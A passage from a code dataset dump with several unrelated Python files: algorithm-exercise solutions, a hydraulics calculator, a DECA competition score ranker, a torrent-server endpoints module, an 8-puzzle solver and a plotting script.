11:20\n\"\"\"\n'''\n给你一个字符串 S、一个字符串 T 。请你设计一种算法,可以在 O(n) 的时间复杂度内,从字符串 S 里面找出:包含 T 所有字符的最小子串。\n\n示例:\n\n输入:S = \"ADOBECODEBANC\", T = \"ABC\"\n输出:\"BANC\"\n\n\n提示:\n\n\n\t如果 S 中不存这样的子串,则返回空字符串 \"\"。\n\t如果 S 中存在这样的子串,我们保证它是唯一的答案。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/minimum-window-substring\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nimport collections\nfrom collections import Counter\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n need = Counter(t)\n window = collections.defaultdict(int)\n valid,L,R,ans = 0,0,0,(-1,len(s))\n while R m\n 1, # nope\n ]\n G_DMN = [\n M3H_TO_M3S,\n LS_TO_M3S,\n 1, # nope\n ]\n\n def convert(cls, x, x_dmn, atr=1.0):\n return x*x_dmn*atr\n\n\nclass PoringHydraulic:\n\n def __init__(self, k_r_src, nu_src, ro_src, d_src, g_src, ksi_src):\n self.w = 0.0\n self.k_r = k_r_src # m\n self.nu = nu_src\n self.ro = ro_src # kg/m3\n self.d = d_src # m\n self.g = g_src # m3/s\n self.re = 0.0\n self.lmd = 0.0\n self.ksi = ksi_src\n self.lidrop = 0.0 # Pa/m\n self.lodrop = 0.0 # Pa\n self.local_drop()\n\n def speed(self):\n try:\n self.w = 4*self.g / (3.1415*pow(self.d, 2))\n except ZeroDivisionError:\n self.w = 0\n return self.w\n\n def reynolds(self):\n if self.w == 0:\n self.w = self.speed()\n self.re = self.w*self.d/self.nu\n return self.re\n\n def _lambda(self):\n wtf = 0.0\n poring_base = 0.0\n lm = 0.0\n\n try:\n if self.re == 0:\n self.re = self.reynolds()\n wtf = 568*self.d/self.k_r\n if self.re < wtf and self.re > 2300:\n poring_base = (self.k_r/self.d + 68/self.re)\n lm = 0.11*pow(poring_base, 0.25)\n\n elif self.re < 2300:\n lm = 64/self.re\n else:\n lm = 0.11*pow(self.k_r/self.d, 0.25)\n\n except ZeroDivisionError:\n lm = 0.0\n\n self.lmd = lm\n return self.lmd\n\n def linear_drop(self):\n\n if self.w == 0:\n self.w = self.speed()\n if self.lmd == 0:\n self.lmd = self._lambda()\n try:\n self.lidrop = self.lmd * pow(self.w, 2) * self.ro / (2 * self.d)\n\n except ZeroDivisionError:\n self.lidrop = 0.0\n\n return self.lidrop\n\n def local_drop(self):\n\n if self.lidrop == 0:\n self.lidrop = self.linear_drop()\n if self.ksi == 0:\n self.lodrop = 0.0\n return 0.0\n else:\n try:\n l_eq = self.ksi * self.d / self.lmd\n self.lodrop = l_eq * self.lidrop\n except ZeroDivisionError:\n self.lodrop = 0.0\n return self.lodrop\n","sub_path":"prghydraulic.py","file_name":"prghydraulic.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592975863","text":"'''\nCreator: Victor Sun\nDate: July 29, 2018\nProgram: Functions for DECA Ranker\nImported Files: os\n'''\nimport os\nfrom os.path import join\nsortby = {\"Overall Score\":1,\n \"Exam Score\":2,\n \"Oral 1 Score\":3,\n \"Oral 2 Score\":4}\n\ndef getFinalScore(event, chapter, name, name2=\"\"):\n events = {\"Apparel and Accessories Marketing Series\":\"AAM\",\n \"Accounting Applications Series\":\"ACT\",\n \"Automotive Services Marketing Series\":\"ASM\",\n \"Business Finance Series\":\"BFS\",\n \"Business Growth Plan\":\"EBG\",\n \"Business Law and Ethics Team Decision Making\":\"BLTDM\",\n \"Business Service Marketing Series\":\"BSM\",\n \"Business Services Operations Research\":\"BOR\",\n \"Buying and Merchandising Operations Research\":\"BMOR\",\n \"Buying and Merchandising Team Decision Making\":\"BTDM\",\n \"Creative Marketing Project\":\"CMP\",\n \"Community Service Project\":\"CSP\",\n \"Entrepreneurship Promotion Project\":\"EOOPP\",\n \"Entrepreneurship Series\":\"ENT\",\n \"Entrepreneurship Team Decision Making\":\"ETDM\",\n \"Fashion Merchandising Promotion Plan\":\"FMP\",\n \"Finance Operations Research\":\"FOR\",\n \"Financial Consulting\":\"FCE\",\n \"Financial Literacy Promotion Project\":\"FLPP\",\n \"Financial Services Team Decision Making\":\"FTDM\",\n \"Food Marketing Series\":\"FMS\",\n \"Franchise Business Plan\":\"EFB\",\n \"Hospitality Services Team Decision Making\":\"HTDM\",\n \"Hospitality and Tourism Operations Research\":\"HTOR\",\n \"Hospitality and Tourism Professional Selling\":\"HTPS\",\n \"Hotel and Lodging Management Series\":\"HLM\",\n \"Human Resources Management Series\":\"HRM\",\n \"Independent Business Plan\":\"EIB\",\n \"Innovation Plan\":\"EIP\",\n \"International Business Plan\":\"IBP\",\n \"Learn and Earn Project\":\"LEP\",\n \"Marketing Communications Series\":\"MCS\",\n \"Marketing Management Team Decision Making\":\"MTDM\",\n \"Personal Financial Literacy\":\"PFL\",\n \"Principles of Business Management and Administration\":\"PBM\",\n \"Principles of Finance\":\"PFN\",\n \"Principles of Marketing\":\"PMK\",\n \"Professional Selling\":\"PSE\",\n \"Public Relations Project\":\"PRP\",\n \"Principles of Hospitality and Tourism\":\"PHT\",\n \"Quick Serve Restaurant Management Series\":\"\",\n \"Restaurant and Food Service Management Series\":\"RFSM\",\n \"Retail Merchandising Series\":\"RMS\",\n \"Sports and Entertainment Marketing Operations Research\":\"SEOR\",\n \"Sports and Entertainment Marketing Series\":\"SEM\",\n \"Sports and Entertainment Marketing Team Decision Making\":\"STDM\",\n \"Sports and Entertainment Promotion Plan\":\"SEPP\",\n \"Start-up Business Plan\":\"ESB\",\n \"Stock Market Game\":\"\",\n \"Travel and Tourism Team Decision Making\":\"TTDM\",\n \"Virtual Business Challenge Accounting\":\"\",\n \"Virtual Business Challenge Fashion\":\"\",\n \"Virtual Business Challenge Hotel Management\":\"\",\n \"Virtual Business Challenge Personal Finance\":\"\",\n \"Virtual Business Challenge Restaurant\":\"\",\n \"Virtual Business Challenge Retail\":\"\",\n \"Virtual Business Challenge Sports\":\"\"}\n for root, folders, files in os.walk(join(os.getcwd(), \"data/transcripts\")):\n if chapter[:10] in root or chapter[10:] in root:\n n2 = 0\n if name2 != \"\":\n for f in files:\n if name2 in f and \"txt\" in f:\n fIn = open(join(\"data/transcripts\",root.split(\"/\")[-1], f), encoding=\"latin-1\")\n for line in fIn:\n try:\n n2 = int(line.strip())\n break\n except:\n pass\n break\n for f in files:\n if name in f and \"txt\" in f:\n ar = []\n fScores = 0\n arFilled = False\n eventCorrect = False\n fIn = open(join(\"data/transcripts\",root.split(\"/\")[-1], f), encoding=\"latin-1\")\n prevLine = \"\"\n for line in fIn:\n if line[:5] == \"Final\":\n fScores += 1\n try:\n n = int(line.strip())\n if not arFilled:\n if n == sum(ar[:len(ar)-fScores]) and len(ar) != 1:\n arFilled = True\n else:\n ar.append(n)\n except(ValueError):\n try:\n if event == \"PBM\" and line.strip() == \"Principles of Business\":\n eventCorrect = True\n break\n if event == \"STDM\" and line.strip() == \"Sports and Entertainment\":\n eventCorrect = True\n break\n elif events[prevLine+\" \"+line.strip()] == event:\n eventCorrect = True\n break\n else:\n prevLine = line.strip()\n except(KeyError):\n try:\n if events[line.strip()] == event:\n eventCorrect = True\n break\n else:\n prevLine = line.strip()\n except(KeyError):\n prevLine = line.strip()\n pass\n if eventCorrect:\n for i in range(fScores):\n ar[len(ar)-i-1] = \"F\"+str(ar[len(ar)-i-1])\n if n2:\n ar[0] = (ar[0] + n2)/2.0\n return \"\\t\"+\"\\t\".join(map(str,ar))\n else:\n return \"\"\n return \"\"\n \nclass Competitor:\n def __init__(self, myID, myEvent, myTeam, myChapter, examScore, oral1Score, oral2Score, myPenalties, overallScore, myChapterID, sortBy):\n self.sort = sortBy\n self.id = myID\n self.event = myEvent\n self.team = myTeam\n self.chapter = myChapter\n self.exam = examScore\n self.oral1 = oral1Score\n self.oral2 = oral2Score\n self.penalties = myPenalties\n self.overall = overallScore\n self.chapterID = myChapterID\n def __str__(self):\n return self.id+\"\\t\"+self.overall\n def __lt__(self, other):\n if self.sort == \"Overall Score\":\n return self.overall < other.getAttr(1)\n elif self.sort == \"Exam Score\":\n return self.overall < other.getAttr(2)\n elif self.sort == \"Oral 1 Score\":\n return self.overall < other.getAttr(3)\n elif self.sort == \"Oral 2 Score\":\n return self.overall < other.getAttr(4)\n def getAttr(self, attrNum):\n if attrNum == 1:\n return self.overall\n elif attrNum == 2:\n return self.exam\n elif attrNum == 3:\n return self.oral1\n elif attrNum == 4:\n return self.oral2\n\nclass Person:\n def __init__(self, myID, firstName, lastName, regional):\n self.id = myID\n self.first = firstName\n self.last = lastName\n self.region = regional\n def __str__(self):\n return self.id+\"\\t\"+self.first+\" \"+self.last\n def getName(self):\n return self.first+\" \"+self.last\n\ndef getAllPeople():\n fIn = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fIn.readline()\n allPeople = {}\n try:\n for line in fIn:\n line = line.strip().split(\",\")\n allPeople[int(line[13])] = Person(line[13], line[17], line[18], line[32])\n except(UnicodeDecodeError):\n print(fIn.readline())\n print(fIn.readline())\n fIn.close()\n return allPeople\n\ndef getAllScores(event, sortBy):\n fIn = open(\"data/scores.txt\", \"r\", encoding=\"latin-1\")\n eventScores = []\n for line in fIn:\n line = line.strip().split(\" \")\n if line[0].isdigit():\n if int(line[0]) >= 10000:\n count = 2\n for i in range(3, len(line)):\n if line[i].isdigit():\n count = i\n break\n if len(line[count:]) == 6:\n if line[2].isdigit():\n score = Competitor(line[0], line[1], line[2], \" \".join(line[3:count]), line[count], line[count+1], line[count+2], line[count+3], line[count+4], line[count+5], sortBy)\n if score.event == event:\n eventScores.append(score)\n else:\n score = Competitor(line[0], line[1], -1, \" \".join(line[2:count]), line[count], line[count+1], line[count+2], line[count+3], line[count+4], line[count+5], sortBy)\n if score.event == event:\n eventScores.append(score)\n fIn.close()\n return eventScores\n\ndef getAllFinalists():\n fIn = open(\"data/transcriptsLabeled.txt\")\n finalists = {}\n for line in fIn:\n l = line.strip().split(\"\\t\", 1)\n finalists[l[0]] = l[1].split(\"\\t\")\n fIn.close()\n return finalists\n\ndef getFinalHeadings(event):\n if event[-3:]==\"TDM\":\n return \"\\tFExam\\tFPCase\\tFFCase\"\n else:\n if event[0] == \"P\":\n return \"\\tFExam\\tFPCase\\tFFCase\"\n else:\n return \"\\tFExam\\tFPCase1\\tFPCase2\\tFFCase\"\n\ndef Rank(event, sort, id=\"\", justOne=False, schoolAr=[]):\n fOut = open(\"output.txt\", \"w\")\n fOut2 = open(\"output.tsv\", \"w\")\n teams = [\"BLTDM\", \"FTDM\", \"HTDM\", \"TTDM\", \"BTDM\", \"MTDM\", \"STDM\", \"ETDM\"]\n\n allPeople = getAllPeople()\n eventScores = getAllScores(event, sort)\n finalists = getAllFinalists()\n if event in teams:\n teams = []\n for myTeam in eventScores:\n if int(myTeam.id)>= 20000:\n teamNum = myTeam.team\n teamID = myTeam.id\n teamChapter = myTeam.chapter\n team = []\n team.append(myTeam)\n for score in eventScores:\n if score.team == teamNum and score.id != teamID and score.chapter == teamChapter:\n team.append(score)\n teams.append(team)\n teams.sort(key=lambda score:int(score[0].getAttr(sortby[sort])), reverse = True) #SORT\n finalsHeading = getFinalHeadings(event)\n fOut.write(\"Event: \"+event+\"\\nRank\\tSchool\\t\\t\\t\\t\\tID\\tName\\t\\t\\tID\\tName\\t\\t\\tScore\\tRegion\\t\"+finalsHeading+\"\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tID\\tName\\tScore\\tRegion\\t\"+finalsHeading+\"\\n\")\n for i in range(len(teams)):\n team = teams[i]\n try:\n title=\"\"\n scorePerson1 = allPeople[int(team[1].id)]\n try:\n scorePerson2 = allPeople[int(team[2].id)]\n except(IndexError):\n scorePerson2 = scorePerson1\n if justOne:\n if scorePerson1.id == id or scorePerson2.id == id or scorePerson1.getName() == id or scorePerson2.getName() == id:\n team.append(scorePerson1)\n team.append(scorePerson2)\n team.append(event)\n team.append(getFinalScore(event, team[1].chapter, scorePerson1.getName(), scorePerson2.getName()))\n schoolAr.append((i+1,team))\n break\n else:\n finalScores = getFinalScore(event, team[1].chapter, scorePerson1.getName(), scorePerson2.getName())\n if id != \"\":\n if scorePerson1.id == id or scorePerson2.id == id or scorePerson1.getName() == id or scorePerson2.getName() == id:\n title = \"Here\"\n fOut.write(str(i+1)+title+\"\\t\"+team[0].chapter.ljust(35, \" \")+\"\\t\"+str(scorePerson1).ljust(25, \" \")+\"\\t\"+str(scorePerson2).ljust(25, \" \")+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region.ljust(12, \" \")+finalScores+\"\\n\")\n fOut2.write(event+\"\\t\"+str(i+1)+\"\\t\"+team[0].chapter+\"\\t\"+str(scorePerson1)+\"\\t\"+str(scorePerson2)+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region+finalScores+\"\\n\")\n except (KeyError):\n print(\"KeyError: \"+team[1].id+\" \"+team[2].id)\n else:\n eventScores = sorted(eventScores, key=lambda score:int(score.getAttr(sortby[sort])), reverse=True) #SORT\n finalsHeading = getFinalHeadings(event)\n fOut.write(\"Event: \"+event+\"\\nRank\\tSchool\\t\\t\\t\\t\\tID\\tName\\t\\t\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\t\"+finalsHeading+\"\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tScore\\tOral1\\tOral2\\tExam\\tRegion\"+finalsHeading+\"\\n\")\n for i in range(len(eventScores)):\n try:\n score = eventScores[i]\n scorePerson = allPeople[int(score.id)]\n title = \"\"\n if justOne:\n if score.id == id or scorePerson.getName() == id:\n schoolAr.append((i+1,[score, scorePerson, getFinalScore(event, score.chapter, scorePerson.getName())]))\n break\n else:\n finalScores = getFinalScore(event, score.chapter, scorePerson.getName())\n title=\"\"\n if id != \"\":\n if score.id == id or scorePerson.getName() == id:\n title = \"Here\"\n fOut.write(str(i+1)+title+\"\\t\"+score.chapter.ljust(35, \" \")+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region.ljust(12, \" \")+finalScores+\"\\n\")\n fOut2.write(event+\"\\t\"+str(i+1)+\"\\t\"+score.chapter+\"\\t\"+str(scorePerson)+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region+finalScores+\"\\n\")\n except (KeyError):\n print(\"KeyError: \"+score.id)\n fOut.close()\n fOut2.close()\n\ndef Find(personID, sortby):\n fIn2 = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fIn2.readline()\n for line in fIn2:\n line = line.strip().split(\",\")\n if line[13] == personID or line[17]+\" \"+line[18] == personID:\n event = line[20]\n break\n try:\n Rank(event, sortby, personID)\n except(UnboundLocalError):\n print(\"Cannot find \"+personID)\n\ndef AllFrom(school, sortby):\n fInAll = open(\"data/Timetables.csv\", \"r\", encoding=\"latin-1\")\n fInAll.readline()\n flag = False\n fOut = open(\"output.txt\", \"w\")\n fOut2 = open(\"output.tsv\", \"w\")\n schoolList = []\n for line in fInAll:\n line = line.strip().split(\",\")\n if line[22] == school:\n event = line[20]\n personID = line[13]\n if event != \"LDA\" and int(personID) >= 10000:\n try:\n print(\"Getting: \"+personID)\n Rank(event, sortby, personID, True, schoolList)\n except(UnboundLocalError):\n print(\"Cannot find \"+personID)\n schoolList.sort()\n num = len(school)/8+1\n fOut.write(\"Individual Series Events:\\nEvent\\tRank\\tID\\tName\\t\\t\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\t\\tInternationals (Exam, Orals, Finals)\\n\")\n fOut2.write(\"Event\\tRank\\tID\\tName\\tScore\\tOral1\\tOral2\\tExam\\tRegion\\tInternational Scores\\n\")\n for i in schoolList:\n if len(i[1]) == 3:\n rank = i[0]\n score = i[1][0]\n scorePerson = i[1][1]\n fOut.write(score.event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region.ljust(12, \" \")+i[1][2]+\"\\n\")\n fOut2.write(score.event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson).ljust(25, \" \")+\"\\t\"+score.overall+\"\\t\"+score.oral1+\"\\t\"+score.oral2+\"\\t\"+score.exam+\"\\t\"+scorePerson.region+i[1][2]+\"\\n\")\n \n num = len(school)/8+1\n fOut.write(\"\\nTeam Series Events:\\nEvent\\tRank\\tID\\tName\\t\\t\\tID\\tName\\t\\t\\tScore\\tRegion\\t\\tInternationals (Exam, Orals, Finals)\\n\")\n fOut2.write(\"Event\\tRank\\tSchool\\tID\\tName\\tID\\tName\\tScore\\tRegion\\tInternational Scores\\n\")\n for i in range(0,len(schoolList),2):\n if len(schoolList[i][1]) == 7:\n rank = schoolList[i][0]\n team = schoolList[i][1]\n scorePerson1 = team[3]\n scorePerson2 = team[4]\n event = team[5]\n fOut.write(event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson1).ljust(25, \" \")+\"\\t\"+str(scorePerson2).ljust(25, \" \")+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region.ljust(12, \" \")+team[6]+\"\\n\")\n fOut2.write(event+\"\\t\"+str(rank)+\"\\t\"+str(scorePerson1)+\"\\t\"+str(scorePerson2)+\"\\t\"+team[0].overall+\"\\t\"+scorePerson1.region+team[6]+\"\\n\")\n fOut.close()\n fOut2.close()\n fInAll.close()\n","sub_path":"rankerFunctions.py","file_name":"rankerFunctions.py","file_ext":"py","file_size_in_byte":17704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"200755604","text":"from multiprocessing import Process\nfrom functools import partial\nfrom utils import *\nimport asyncio\nimport config\nimport os\nimport json\nimport re\nimport secrets\nimport string\nimport uuid\n\n\n# call run_daemon create necessary objects and configs\ndef start_server():\n p = Process(target=run_daemon)\n p.start()\n\n keys_path = os.path.join(os.getcwd(), \"hash_keys.json\")\n\n if os.path.exists(keys_path):\n with open(keys_path) as keys_file:\n return (p, json.load(keys_file))\n else:\n return (p, {})\n\n\n# supposed to exit from server\n# stop long-running process\ndef destroy_server(p, f_names):\n try:\n p.terminate()\n except:\n print(\"Process already exited.\")\n\n keys_path = os.path.join(\n os.getcwd(),\n \"hash_keys.json\")\n\n if f_names:\n if os.path.exists(keys_path):\n os.remove(keys_path)\n \n with open(keys_path, \"w+\") as keys_file:\n json.dump(f_names, keys_file)\n \n\n# acquire .torrent file\n# call handler for add\n# return unique key of torrent to client\ndef add(f_names, paths):\n\ttry:\n\t\ttorrent_paths = []\n\t\tfor path in paths:\n\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\ttorrent_paths.append(torrent_path)\n\n\t\trun_async(partial(add_torrent, torrent_paths, config.DOWNLOAD_DIR))\n\t\t\n\texcept Exception as e:\n\t\tprint(\"Exception occurred in add: {}\".format(e))\n\t\treturn e\n\n\ttorrent_ids = []\n\tfor path in paths:\n\t\ttorrent_id = secrets.choice(range(1000, 10000))\n\t\ttorrent_id = str(format(torrent_id, \"04\"))\n\t\twhile torrent_id in f_names:\n\t\t\ttorrent_id = secrets.choice(range(1000, 10000))\n\t\t\ttorrent_id = str(format(torrent_id, \"04\"))\n\t\t\ttorrent_ids.append(torrent_id)\n\t\tf_names[torrent_id] = path\n\treturn torrent_ids\n\n\ndef remove(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.pop(hash_key), hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\trun_async(partial(remove_torrent, paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# pause a download specified by a specific key\ndef pause(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.get(hash_key), hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\trun_async(partial(pause_torrent, paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# resume a download specified by a specific key\ndef resume(f_names, hash_keys):\n\tprint(hash_keys)\n\tpaths = list(map(\n\t\tlambda hash_key: f_names.get(hash_key), hash_keys))\n\tprint(paths)\n\t# import pdb; pdb.set_trace()\n\tif paths:\n\t\ttry:\n\t\t\ttorrent_paths = []\n\t\t\tfor path in paths:\n\t\t\t\ttorrent_path = \"{}/{}\".format(config.TORRENT_CACHE, path)\n\t\t\t\ttorrent_paths.append(torrent_path)\n\t\t\n\t\t\trun_async(partial(resume_torrent, paths, config.DOWNLOAD_DIR))\n\t\texcept Exception as e:\n\t\t\tprint(\"Exception occurred: {}\".format(e))\n\t\t\treturn e\n\t\treturn list(paths)\n\telse:\n\t\treturn FileNotFoundError(\"Hash key must be invalid\")\n\n\n# retrieve downloaded file on client side\n# returns paths (on the server) to directories containing the completed torrents\ndef retrieve(f_names, hash_keys):\n\tpaths = []\n\tfor key in hash_keys:\n\t\tpath = f_names.get(key)\n\t\tif path:\n\t\t\tpaths.append(path.replace(\".torrent\", \"/\"))\n\t\telse:\n\t\t\treturn FileNotFoundError(\"Hash key {} is invalid\".format(key))\n\n\treturn paths\n\n\n# displays info on the torrent that you are downloading\ndef info(f_names, hash_keys):\n for key in hash_keys:\n path = f_names.get(key)\n if path:\n torrent_info = TorrentInfo.from_file(path, download_dir=None)\n content_description = formatters.join_lines(\n formatters.format_title(torrent_info, True) + formatters.format_content(torrent_info))\n yield content_description\n else:\n yield FileNotFoundError(\"Hash key {} is invalid\".format(key))\n","sub_path":"server/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448146596","text":"# '(' 의 개수와 ')' 의 개수가 같다, 균형잡힌 괄호 문자열\n# '('와 ')'의 괄호의 짝도 모두 맞을 경우, 올바른 괄호 문자열\nimport sys\nsys.setrecursionlimit(10000)\n\ndef solution(p):\n answer = ''\n # 괄호 방향 뒤집는 함수\n def change(word):\n change_word = ''\n for w in word:\n change_word += ')' if w == '(' else '('\n return change_word\n # 올바른 괄호인지 검사하는 함수\n def right(word):\n if len(word) == 0: return 0\n left, right = 0, 0\n for i in word:\n if i == '(':\n left += 1\n elif i == ')':\n right += 1\n if right >= left:\n break\n return 1 if left+right == len(word) else 0\n # 주어진 규칙(3, 4)대로 검사하는 함수\n def go(u, v):\n if right(u): # 조건 3, u가 올바른 괄호 문자열이면\n u += solution(v) # 조건 3-1, 결과를 u에 붙인 후\n return u # 조건 3-1, 반환\n else: # 조건 4, u가 올바른 괄호 문자열아니면\n a = '(' # 조건 4-1, 빈 문자열에 (\n a += solution(v) # 조건 4-2, v에 1단계부터 재귀적으로 수행한 결과 붙임\n a += ')' # 조건 4-3, )를 다시 붙임\n a += change(u[1:len(u)-1]) # 조건 4-4, u의 첫번째와 마지막 문자 제거, 뒤집어서 붙임\n return a # 조건 4-5, 반환\n # 균형잡힌 괄호인지 확인\n def balance(word):\n cnt = 0\n idx = 0\n while 1:\n if word[idx] == ')':\n cnt -= 1\n else:\n cnt += 1\n if cnt == 0:\n return idx\n idx += 1\n\n L = len(p)\n if L == 0: # 조건 1\n return answer\n # 조건 2\n if right(p):\n return p\n else:\n idx = balance(p)\n\n if idx == L-1: # 끝까지 가야 right면\n # print('end')\n answer = go(p, '')\n else: # 중간에 나눌 수 있으면\n # print('middle')\n print(p[:idx+1], p[idx+1:])\n answer = go(p[:idx+1], p[idx+1:])\n\n\n # lg, rg = '', ''\n # left, right = 0, 0\n # while 1:\n return answer\n\n# print(solution(\"(()())()\"))\n# print(solution(\")(\"))\nprint(solution(\"()))((()\"))\n# print(solution(\"))((()\"))\n\n# def check(one):","sub_path":"0524/괄호 변환_김현성.py","file_name":"괄호 변환_김현성.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393315045","text":"#!/usr/bin/env python3\nfrom random import shuffle;\n\ndef getSequences (stepsTaken, initialState, targetState):\n\tevaluation = hamming (stepsTaken, initialState, targetState);\n\tnextState = initialState;\n\tpreviousState = None;\n\tsequence = [];\n\tcount = 0;\n\n\twhile (not evaluation == 0):\n\t\tnextStates = getNextStates (nextState);\n\t\tif (not previousState == None):\n\t\t\tnextStates.pop (nextStates.index (previousState));\n\n\t\tcosts = [hamming (stepsTaken, state, targetState) for state in nextStates];\n\t\tevaluation = min (costs);\n\t\tpreviousState = nextState;\n\t\tnextState = nextStates [costs.index (evaluation)];\n\t\tsequence.append (nextState);\n\t\tstepsTaken += 1;\n\n#\t\tprint (\"Next states: \", nextStates);\n#\t\tprint (\"Costs: \", costs);\n#\t\tprint (\"Min Cost: \", evaluation);\n#\t\tprint (\"Next state to take: \", nextState);\n#\t\tprint (\"Steps taken: \", stepsTaken);\n#\t\tprint (\"Total sequence: \", sequence);\n#\t\tif (count == 3):\n#\t\t\tbreak;\n#\n#\t\tcount += 1;\n\n\treturn (stepsTaken, sequence);\n\n#getNextStates () generates all the possible states that could exist after we take 1 step, give the current state of the puzzle board\ndef getNextStates (currentState):\n\tstates = [];\n\t#the changePositions dicitonary is specific for this puzzle, since it has 9 squares (position 0 to 8). For each position X, we assume that the blank ('-') exists at X and then feed in the positions of the tiles that can be moved.\n\t#for eg - if '-' exists at position 0, i.e., top left of board, then the positions are 1 and 3 because the tile to the blank's right can be moved to left, and the tile below the blank can be moved up.\n\tchangePositions = {\n\t\t0 : [1, 3],\n\t\t1 : [0, 2, 4],\n\t\t2 : [1, 5],\n\t\t3 : [0, 4, 6],\n\t\t4 : [1, 3, 5, 7],\n\t\t5 : [2, 4, 8],\n\t\t6 : [3, 7],\n\t\t7 : [4, 6, 8],\n\t\t8 : [5, 7]\n\t};\n\n\tfor i in range (0, len (currentState)):\n\t\tif (currentState [i] == '-'):\n\t\t\tslideTiles = changePositions [i];\n\t\t\tfor pos in slideTiles:\n\t\t\t\ttemp = list (currentState);\n\t\t\t\tbuf = temp [pos];\n\t\t\t\ttemp [pos] = '-';\n\t\t\t\ttemp [i] = buf;\n\t\t\t\tstates.append (''.join (temp));\n\n\treturn (states);\n\ndef hamming (stepsTaken, currentState, targetState):\n\twrongCount = 0;\n\n\twrongCount = len ([i for i in range (0, len (targetState)) if not (currentState [i] == targetState [i] or currentState [i] == '-')]);\n\treturn (wrongCount + stepsTaken);\n\nif (__name__ == '__main__'):\n\tstepsTaken = 0;\n\ttargetState = '12345678-';\n\n\tinitialState = list (targetState);\n\tshuffle (initialState);\n\tinitialState = ''.join (initialState);\n\n\tprint (\"Initial State is: \");\n\tfor i in range (0, len (initialState), 3):\n\t\tprint (initialState [i], initialState [i + 1], initialState [i + 2]);\n\n\tprint (\"\\nTarget State is: \");\n\tfor i in range (0, len (targetState), 3):\n\t\tprint (targetState [i], targetState [i + 1], targetState [i + 2]);\n\n\tprint (\"\\n----------------------------------\\n\");\n\tstepsTaken, sequence = getSequences (stepsTaken, initialState, targetState);\n#\tprint (\"Solved in \" + str (stepsTaken) + \" steps.\");\n\n#\tprint (\"\\n-------------------------------------------\\n\");\n#\tfor sequence in sequences:\n#\t\tfor i in range (0, len (sequence), 3):\n#\t\t\tprint (sequence [i], sequence [i + 1], sequence [i + 2]);\n#\t\tprint (\"\\n-------------------------------------------\\n\");\n","sub_path":"Heuristics/8 Puzzle through A*/8_puzzle.py","file_name":"8_puzzle.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"377218707","text":"from matplotlib import pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nstyle.use('ggplot')\nplt.title('Max Fitness in Each Generation')\nplt.xlabel('Generations')\nplt.ylabel('Fitness')\n\nx = np.load('plots.npy')\n\nxaxis = [i[0] for i in x]\nyaxis = [i[1] for i in x]\nprint(yaxis)\nplt.plot(xaxis,yaxis)\nplt.show()\n\n","sub_path":"CartPole/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459921032","text":"class Solution:\r\n # @param num, a list of integer\r\n # @return an integer\r\n def findMin(self, num):\r\n \"\"\"\r\n Fourth iteration\r\n \"\"\"\r\n n = len(num)\r\n l, r = 0, n - 1\r\n while l < r:\r\n m = (l + r) / 2\r\n if m + 1 < n and num[m] > num[m + 1]:\r\n l = m\r\n break\r\n if num[l] > num[m]:\r\n r = 